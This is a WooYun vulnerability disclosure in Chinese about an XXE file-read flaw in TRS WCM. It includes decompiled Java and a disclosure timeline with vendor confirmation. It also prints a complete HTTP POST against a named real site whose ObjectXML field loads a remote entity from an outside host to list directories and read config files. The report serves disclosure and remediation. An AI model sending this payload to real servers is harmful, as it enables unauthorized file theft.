乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-10: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-15: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2015-12-06: 细节向核心白帽子及相关领域专家公开 2015-12-16: 细节向普通白帽子公开 2015-12-26: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
TRSWCM文件读取漏洞,好像是通杀所有版本……
在com/trs/cms/content/WCMObjHelper.java中的private static void parseXMLFile()使用SAX解析XML导致实体注入:
/* */ private static void parseXMLFile(InputSource paramInputSource, DefaultHandler paramDefaultHandler, boolean paramBoolean)/* */ throws WCMException/* */ {/* */ try/* */ {/* 270 */ SAXParserFactory localSAXParserFactory = SAXParserFactory.newInstance();/* 271 */ localSAXParserFactory.setValidating(paramBoolean);/* */ /* 274 */ localSAXParserFactory.newSAXParser().parse(paramInputSource, paramDefaultHandler);//解析XML/* */ } catch (SAXException localSAXException) {/* 276 */ throw new WCMException(150, I18NMessage.get(WCMObjHelper.class, "WCMObjHelper.label6", "解析数据时发生异常!") + localSAXException.getMessage(), localSAXException);/* */ }/* */ catch (ParserConfigurationException localParserConfigurationException)/* */ {/* 282 */ logger.debug("ParserConfigurationException:" + localParserConfigurationException.getMessage());/* */ } catch (IOException localIOException) {/* 284 */ logger.debug("IOException:" + localIOException.getMessage());/* */ }/* */ }
此方法最终在reg_newuser_dowith.jsp文件中被调用:
public static CMSObj toWCMObj(String paramString, CMSObj paramCMSObj)/* */ throws WCMException/* */ {/* 77 */ if ((paramString == null) || (paramString.length() <= 0)) {/* 78 */ return null;/* */ }/* 80 */ Reader localReader = null;/* */ try {/* 82 */ WCMHandler localWCMHandler = new WCMHandler(paramCMSObj);/* */ /* 86 */ localReader = getReader(CMyString.filterForJDOM(paramString));/* 87 */ parseXMLFile(new InputSource(localReader), localWCMHandler, false);//调用parseXMLFile()/* */ /* 89 */ CMSObj localCMSObj1 = localWCMHandler.getWCMObj();/* 90 */ localCMSObj1.removeProperty(localCMSObj1.getIdFieldName());/* */
//6.业务代码 try{ currUser = (User)WCMObjHelper.toWCMObj(currRequestHelper.getString("ObjectXML"), loginUser, 0, User.class);//调用toWCMObj() } catch(Exception ex){ throw new WCMException(ExceptionNumber.ERR_PROPERTY_VALUE_INVALID, "保存用户时因属性值不正确而失败中止!", ex); } currUser.save(loginUser);
以wcm.cnr.cn为例,直接burpsuite发送以下数据包,在1.xml中使用gopher、ftp等协议控制读取文件等操作:
POST /wcm/console/auth/reg_newuser_dowith.jsp HTTP/1.1Host: wcm.cnr.cnUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://wcm.cnr.cn/wcm/console/auth/reg_newuser.jspCookie: JSESSIONID=70C0A254A8662618477A7C2C709C614AConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 97ObjectXML=<!DOCTYPE+root+[<!ENTITY+%25+remote+SYSTEM+"http%3a//ip/1.xml">%25remote%3b]>
列出目录:
读取文件config.xml:
同上
获取ObjectXML等参数传递的数据的时候过滤其中的<!DOCTYPE关键字
危害等级:高
漏洞Rank:20
确认时间:2015-10-12 13:36
感谢您的反馈,经确认问题存在。在非可控的xml输入源的情况下,解析xml时存在安全隐患,目前已完成修复方案的制定和补丁包的提供,将尽快为用户进行修复。*** 安全无止境,我们一直在努力!***
暂无